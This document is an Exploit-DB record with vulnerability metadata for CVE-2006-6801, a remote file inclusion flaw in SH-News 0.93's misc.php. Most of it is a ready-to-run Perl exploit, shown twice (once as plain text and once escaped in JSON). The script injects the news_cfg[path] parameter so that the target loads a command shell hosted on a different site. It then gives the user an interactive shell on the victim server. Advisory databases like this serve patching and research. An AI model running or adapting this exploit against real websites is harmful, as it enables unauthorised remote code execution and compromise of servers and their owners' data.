ID EDB-ID:2984
Type exploitdb
Reporter bd0rk
Modified 2006-12-23T00:00:00
Description
SH-News 0.93 (misc.php) Remote File Include Exploit. CVE-2006-6801. Webapps exploit for php platform
#!/usr/bin/perl
#
#SH-News 0.93 (misc.php) Remote File Include Exploit
#
#Download: http://www.scripthome.de/down.php?id=6
#
#Vulnerable Code: require "{$news_cfg['path']}/german.inc.php";
#
#Coded by bd0rk || SOH-Crew
#
#Usage: shnews.pl [target] [cmd shell] [shell variable]
#
#Greetings: str0ke, TheJT, Kacper, rgod
#
#
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'misc.php?news_cfg[path]='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[....]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}
else {print "[shell] \$";}}}last;
sub head()
{
print "\n============================================================================\r\n";
print " *SH-News 0.93 (misc.php) Remote File Include Exploit*\r\n";
print "============================================================================\r\n";
}
sub usage()
{
head();
print " Usage: shnews.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
print " <Site> - Full path to SHNews ex: http://www.site.com/ \r\n";
print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "============================================================================\r\n";
print " Bug Found by bd0rk \r\n";
print " www.soh-crew.it.tt \r\n";
print "============================================================================\r\n";
exit();
}
# milw0rm.com [2006-12-23]
{"id": "EDB-ID:2984", "hash": "6c9e0b2e3bc4157fce1837b087b8b18e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SH-News 0.93 misc.php Remote File Include Exploit", "description": "SH-News 0.93 (misc.php) Remote File Include Exploit. CVE-2006-6801. Webapps exploit for php platform", "published": "2006-12-23T00:00:00", "modified": "2006-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2984/", "reporter": "bd0rk", "references": [], "cvelist": ["CVE-2006-6801"], "lastseen": "2016-01-31T17:28:48", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-01-31T17:28:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6801"]}, {"type": "osvdb", "idList": ["OSVDB:32488"]}], "modified": "2016-01-31T17:28:48"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2984/", "sourceData": "#!/usr/bin/perl\n#\n#SH-News 0.93 (misc.php) Remote File Include Exploit\n#\n#Download: http://www.scripthome.de/down.php?id=6\n#\n#Vulnerable Code: require \"{$news_cfg['path']}/german.inc.php\";\n#\n#Coded by bd0rk || SOH-Crew\n#\n#Usage: shnews.pl [target] [cmd shell] [shell variable]\n#\n#Greetings: str0ke, TheJT, Kacper, rgod\n#\n#\n\nuse LWP::UserAgent;\n\n$Path = $ARGV[0];\n$Pathtocmd = $ARGV[1];\n$cmdv = $ARGV[2];\n\nif($Path!~/http:\\/\\// || $Pathtocmd!~/http:\\/\\// || !$cmdv){usage()}\n\nhead();\n\nwhile()\n{\n print \"[shell] \\$\";\nwhile(<STDIN>)\n {\n $cmd=$_;\n chomp($cmd);\n\n$xpl = LWP::UserAgent->new() or die;\n$req = HTTP::Request->new(GET =>$Path.'misc.php?news_cfg[path]='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die \"\\nCould Not connect\\n\";\n\n$res = $xpl->request($req);\n$return = $res->content;\n$return =~ tr/[\\n]/[....]/;\n\nif (!$cmd) {print \"\\nPlease Enter a Command\\n\\n\"; $return =\"\";}\n\nelsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)\n {print \"\\nCould Not Connect to cmd Host or Invalid Command Variable\\n\";exit}\nelsif ($return =~/^<br.\\/>.<b>Fatal.error/) {print \"\\nInvalid Command or No Return\\n\\n\"}\n\nif($return =~ /(.*)/)\n\n\n{\n $finreturn = $1;\n $finreturn=~ tr/[....]/[\\n]/;\n print \"\\r\\n$finreturn\\n\\r\";\n last;\n}\n\nelse {print \"[shell] \\$\";}}}last;\n\nsub head()\n {\n print \"\\n============================================================================\\r\\n\";\n print \" *SH-News 0.93 (misc.php) Remote File Include Exploit*\\r\\n\";\n print \"============================================================================\\r\\n\";\n }\nsub usage()\n {\n head();\n print \" Usage: shnews.pl [target] [cmd shell location] [cmd shell variable]\\r\\n\\n\";\n print \" <Site> - Full path to SHNews ex: http://www.site.com/ \\r\\n\";\n print \" <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \\r\\n\";\n print \" <cmd variable> - Command variable used in php shell \\r\\n\";\n print \"============================================================================\\r\\n\";\n print \" Bug Found by bd0rk \\r\\n\";\n print \" www.soh-crew.it.tt \\r\\n\";\n print \"============================================================================\\r\\n\";\n exit();\n }\n\n# milw0rm.com [2006-12-23]\n", "osvdbidlist": ["32488"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:35", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in misc.php in SH-News 0.93, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the news_cfg[path] parameter.\nSuccessful exploitation requires that \"register_globals\" is enabled.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-6801", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6801", "published": "2006-12-28T21:28:00", "title": "CVE-2006-6801", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\n[Secunia Advisory ID:23524](https://secuniaresearch.flexerasoftware.com/advisories/23524/)\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2984\nFrSIRT Advisory: ADV-2006-5161\n[CVE-2006-6801](https://vulners.com/cve/CVE-2006-6801)\nBugtraq ID: 21761\n", "modified": "2006-12-23T08:03:49", "published": "2006-12-23T08:03:49", "href": "https://vulners.com/osvdb/OSVDB:32488", "id": "OSVDB:32488", "title": "SH-News misc.php news_cfg Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
